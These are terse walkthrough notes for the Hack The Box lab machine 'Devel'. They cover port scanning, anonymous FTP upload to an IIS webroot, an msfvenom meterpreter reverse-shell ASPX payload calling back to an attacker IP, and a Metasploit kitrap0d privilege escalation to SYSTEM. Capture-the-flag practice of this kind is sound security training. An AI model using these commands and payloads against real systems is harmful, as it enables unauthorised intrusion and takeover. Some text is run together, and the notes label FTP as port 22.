HTB - 4. Devel
-
nmap -T4 -p- -A 10.10.10.5shows 22 (FTP) with anonymous login (to webroot directory?), 80 (HTTP) with Microsoft IIS httpd 7.5 -
Go to
10.10.10.5which is a default web page -
dirbuster(dirbandgobusterpopular as well) withhttp://10.10.10.5:80, wordlist/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt, and change file-extension toasm, asmx, asp, aspx, txtbecause server is IIS -
FTP: upload file to server
ftp 10.10.10.5 anonymous anonymous ls pwd put dog.jpg lsGo to
10.10.10.5/dog.jpgand it executes. -
msfvenomCreate
reverse_tcppayload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > ex.aspxOpen up port to listen on:
sudo msfconsole use exploit/multi/handler options set payload windows/meterpreter/reverse_tcp options set LHOST 10.10.14.24 run -
Back to FTP
binary <-- swith to binary instead of ascii put ex.aspxGo to
10.10.10.5/ex.aspxand shell popped -
Hacked
sysinfo getuidResult: We are
IIS APPPOOL\Webnot authority system.getsystemfailed.Check to see which privilege escalation exploits might work:
background search suggester use post/multi/recon/local_exploit_suggester options set SESSION 1 runRun privilege escalation
use exploit/windows/local/ms10_015_kitrap0d options set SESSION 1 options run options set lhost 10.10.14.24 <-- make sure using the right interface set lport 4445 <-- Need to use different port since 4445 already in use options runResult: Shell popped with authority system